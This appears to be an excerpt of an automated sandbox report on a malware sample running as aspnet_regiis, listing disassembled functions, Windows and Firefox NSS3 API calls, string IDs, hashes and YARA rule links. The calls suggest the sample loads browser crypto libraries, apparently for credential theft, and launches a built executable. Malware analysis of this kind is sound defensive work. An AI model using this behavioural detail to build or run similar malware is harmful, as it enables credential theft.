                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                              • String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                              • API String ID: 593473924-707647140
                                                                                                                                                                              • Opcode ID: 8d23c44f4be646eace690484ca7d8038b8a5068282d9ed08d99b499711e8f143
                                                                                                                                                                              • Instruction ID: ef66b07c9f1b3dc5c4cf7f149a26961f0b5f3d48869ae156be0ec9f243e1db16
                                                                                                                                                                              • Opcode Fuzzy Hash: 8d23c44f4be646eace690484ca7d8038b8a5068282d9ed08d99b499711e8f143
                                                                                                                                                                              • Instruction Fuzzy Hash: 015168B1F105116BE70096309C51FBF36669BD2318F544638E80296BC2FB66A93E82E7
                                                                                                                                                                              Function 02A24B17 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 02A24B1F
                                                                                                                                                                              • __mtterm.LIBCMT ref: 02A24B2B
                                                                                                                                                                                • Part of subcall function 02A247EA: RtlDecodePointer.NTDLL(FFFFFFFF), ref: 02A247FB
                                                                                                                                                                                • Part of subcall function 02A247EA: TlsFree.KERNEL32(FFFFFFFF), ref: 02A24815
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02A24B41
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02A24B4E
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02A24B5B
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02A24B68
                                                                                                                                                                              • TlsAlloc.KERNEL32 ref: 02A24BB8
                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 02A24BD3
                                                                                                                                                                              • __init_pointers.LIBCMT ref: 02A24BDD
                                                                                                                                                                              • RtlEncodePointer.NTDLL ref: 02A24BEE
                                                                                                                                                                              • RtlEncodePointer.NTDLL ref: 02A24BFB
                                                                                                                                                                              • RtlEncodePointer.NTDLL ref: 02A24C08
                                                                                                                                                                              • RtlEncodePointer.NTDLL ref: 02A24C15
                                                                                                                                                                              • RtlDecodePointer.NTDLL(Function_0002496E), ref: 02A24C36
                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 02A24C4B
                                                                                                                                                                              • RtlDecodePointer.NTDLL(00000000), ref: 02A24C65
                                                                                                                                                                              • __initptd.LIBCMT ref: 02A24C70
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02A24C77
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                              • API String ID: 3732613303-3819984048
                                                                                                                                                                              • Opcode ID: 0810504ba98427143799ced96fb3e0d045cfd91e1f1d1a657c308ac41669e8b8
                                                                                                                                                                              • Instruction ID: 272facc46670c01a04c83367f532f8839026f83f8562d85114ad722c337882c7
                                                                                                                                                                              • Opcode Fuzzy Hash: 0810504ba98427143799ced96fb3e0d045cfd91e1f1d1a657c308ac41669e8b8
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A315C31D84BB09BDB12AF7DAD4860A3FA5EB59725B000D2AF415D3250DFB4C46ACF50
                                                                                                                                                                              Function 6CBE4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CBD4F51,00000000), ref: 6CBE4C50
                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBD4F51,00000000), ref: 6CBE4C5B
                                                                                                                                                                              • PR_smprintf.NSS3(6CCBAAF9,?,0000002F,?,?,?,00000000,00000000,?,6CBD4F51,00000000), ref: 6CBE4C76
                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CBD4F51,00000000), ref: 6CBE4CAE
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBE4CC9
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBE4CF4
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBE4D0B
                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBD4F51,00000000), ref: 6CBE4D5E
                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBD4F51,00000000), ref: 6CBE4D68
                                                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CBE4D85
                                                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CBE4DA2
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBE4DB9
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBE4DCF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                              • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                              • API String ID: 3756394533-2552752316
                                                                                                                                                                              • Opcode ID: 835283579228d4d0ad7ababb0e8c76303c6d10095610757b23a4f47390954fa4
                                                                                                                                                                              • Instruction ID: fb959a98417367d8aee73c36a39385a0efd5bf2d6cda790b3b9db17cccca9ee0
                                                                                                                                                                              • Opcode Fuzzy Hash: 835283579228d4d0ad7ababb0e8c76303c6d10095610757b23a4f47390954fa4
                                                                                                                                                                              • Instruction Fuzzy Hash: 30417BB19001D16BDB115F999C41ABF3675EB9A788F148128EC1A5BB01EB31EC54CBD3
                                                                                                                                                                              Function 02A1260C Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 204stringprocesssynchronizationCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • _memset.LIBCMT ref: 02A127B1
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A127C3
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A36698), ref: 02A127D5
                                                                                                                                                                              • lstrcat.KERNEL32(?,b74ef0d8ce56e494b0d83e1d5be9dbeb), ref: 02A127E7
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3669C), ref: 02A127F9
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A12809
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A366A0), ref: 02A1281B
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A12824
                                                                                                                                                                              • lstrcat.KERNEL32(?,EMPTY), ref: 02A12840
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A366AC), ref: 02A12852
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A12862
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A366B0), ref: 02A12874
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A12881
                                                                                                                                                                              • _memset.LIBCMT ref: 02A128B7
                                                                                                                                                                                • Part of subcall function 02A10549: lstrlen.KERNEL32(?,?,02A17174,02A366CF,02A366CE,?,?,?,?,02A1858F), ref: 02A1054F
                                                                                                                                                                                • Part of subcall function 02A10549: lstrcpy.KERNEL32(00000000,00000000), ref: 02A10581
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A12446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,02A14A8D), ref: 02A12460
                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,02A366B4,?), ref: 02A12924
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02A12932
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
                                                                                                                                                                              • String ID: .exe$EMPTY$b74ef0d8ce56e494b0d83e1d5be9dbeb
                                                                                                                                                                              • API String ID: 141474312-2994726203
                                                                                                                                                                              • Opcode ID: 8b09beca195b31ab6f067f650b2b348c6961448beb16623930b8c190ded03f66
                                                                                                                                                                              • Instruction ID: 309f6afe3d1997fdee91e275efcac3fa23a14f42070bdebfe9128e418edc4ab6
                                                                                                                                                                              • Opcode Fuzzy Hash: 8b09beca195b31ab6f067f650b2b348c6961448beb16623930b8c190ded03f66
                                                                                                                                                                              • Instruction Fuzzy Hash: 7E81F9B2D80229ABDF21AF64DD84BCE7779BB04314F4044A5BB09B3050DB70AF898F58
                                                                                                                                                                              Function 6CBC6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6CBC6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CBC6943
                                                                                                                                                                                • Part of subcall function 6CBC6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CBC6957
                                                                                                                                                                                • Part of subcall function 6CBC6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CBC6972
                                                                                                                                                                                • Part of subcall function 6CBC6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CBC6983
                                                                                                                                                                                • Part of subcall function 6CBC6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CBC69AA
                                                                                                                                                                                • Part of subcall function 6CBC6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CBC69BE
                                                                                                                                                                                • Part of subcall function 6CBC6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CBC69D2
                                                                                                                                                                                • Part of subcall function 6CBC6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CBC69DF
                                                                                                                                                                                • Part of subcall function 6CBC6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CBC6A5B
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CBC6D8C
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBC6DC5
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6DD6
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6DE7
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CBC6E1F
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBC6E4B
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBC6E72
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6EA7
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6EC4
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6ED5
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBC6EE3
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6EF4
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6F08
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBC6F35
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6F44
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBC6F5B
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBC6F65
                                                                                                                                                                                • Part of subcall function 6CBC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CBC781D,00000000,6CBBBE2C,?,6CBC6B1D,?,?,?,?,00000000,00000000,6CBC781D), ref: 6CBC6C40
                                                                                                                                                                                • Part of subcall function 6CBC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CBC781D,?,6CBBBE2C,?), ref: 6CBC6C58
                                                                                                                                                                                • Part of subcall function 6CBC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CBC781D), ref: 6CBC6C6F
                                                                                                                                                                                • Part of subcall function 6CBC6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CBC6C84
                                                                                                                                                                                • Part of subcall function 6CBC6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CBC6C96
                                                                                                                                                                                • Part of subcall function 6CBC6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CBC6CAA
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBC6F90
                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBC6FC5
                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3 ref: 6CBC6FF4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1304971872-0
                                                                                                                                                                              • Opcode ID: 36d4b12ec1a14f9e82e08829c3baae47a185fc8b6ace09713de9ac81ee4024af
                                                                                                                                                                              • Instruction ID: 30eecfbdcf5f9c56df14df630a4bdbf315af71980b69e57eb8d861ef463c4617
                                                                                                                                                                              • Opcode Fuzzy Hash: 36d4b12ec1a14f9e82e08829c3baae47a185fc8b6ace09713de9ac81ee4024af
                                                                                                                                                                              • Instruction Fuzzy Hash: 73B14CB4F0129A9BDF00DBA5D844FAEBBB4EF09349F140025E815E7641EB31E955CBA3
                                                                                                                                                                              Function 6CBC4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CBC4C4C
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBC4C60
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4CA1
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CBC4CBE
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4CD2
                                                                                                                                                                              • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4D3A
                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4D4F
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4DB7
                                                                                                                                                                                • Part of subcall function 6CC2DD70: TlsGetValue.KERNEL32 ref: 6CC2DD8C
                                                                                                                                                                                • Part of subcall function 6CC2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC2DDB4
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CB0204A), ref: 6CB707AD
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CB0204A), ref: 6CB707CD
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CB0204A), ref: 6CB707D6
                                                                                                                                                                                • Part of subcall function 6CB707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CB0204A), ref: 6CB707E4
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsSetValue.KERNEL32(00000000,?,6CB0204A), ref: 6CB70864
                                                                                                                                                                                • Part of subcall function 6CB707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB70880
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsSetValue.KERNEL32(00000000,?,?,6CB0204A), ref: 6CB708CB
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsGetValue.KERNEL32(?,?,6CB0204A), ref: 6CB708D7
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsGetValue.KERNEL32(?,?,6CB0204A), ref: 6CB708FB
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CBC4DD7
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBC4DEC
                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CBC4E1B
                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CBC4E2F
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4E5A
                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CBC4E71
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBC4E7A
                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CBC4EA2
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CBC4EC1
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBC4ED6
                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CBC4F01
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBC4F2A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 759471828-0
                                                                                                                                                                              • Opcode ID: 09d19787b977aaaad14ea5c55f7f0a8f09ad5681c884427d8e52b603b8ca4814
                                                                                                                                                                              • Instruction ID: a353f8e8ac2f62624ea21d5470f581a453508bd329e31924ce3c84419dabd696
                                                                                                                                                                              • Opcode Fuzzy Hash: 09d19787b977aaaad14ea5c55f7f0a8f09ad5681c884427d8e52b603b8ca4814
                                                                                                                                                                              • Instruction Fuzzy Hash: 1BB10F75B002069FEB00EF68D844AAA77B4FF0A319F154124ED1597B11EB34EA65CFE2
                                                                                                                                                                              Function 6CC16E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CC16BF7), ref: 6CC16EB6
                                                                                                                                                                                • Part of subcall function 6CB71240: TlsGetValue.KERNEL32(00000040,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB71267
                                                                                                                                                                                • Part of subcall function 6CB71240: EnterCriticalSection.KERNEL32(?,?,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB7127C
                                                                                                                                                                                • Part of subcall function 6CB71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB71291
                                                                                                                                                                                • Part of subcall function 6CB71240: PR_Unlock.NSS3(?,?,?,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB712A0
                                                                                                                                                                              • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CCBFC0A,6CC16BF7), ref: 6CC16ECD
                                                                                                                                                                              • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC16EE0
                                                                                                                                                                              • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CC16EFC
                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CC16F04
                                                                                                                                                                              • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC16F18
                                                                                                                                                                              • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CC16BF7), ref: 6CC16F30
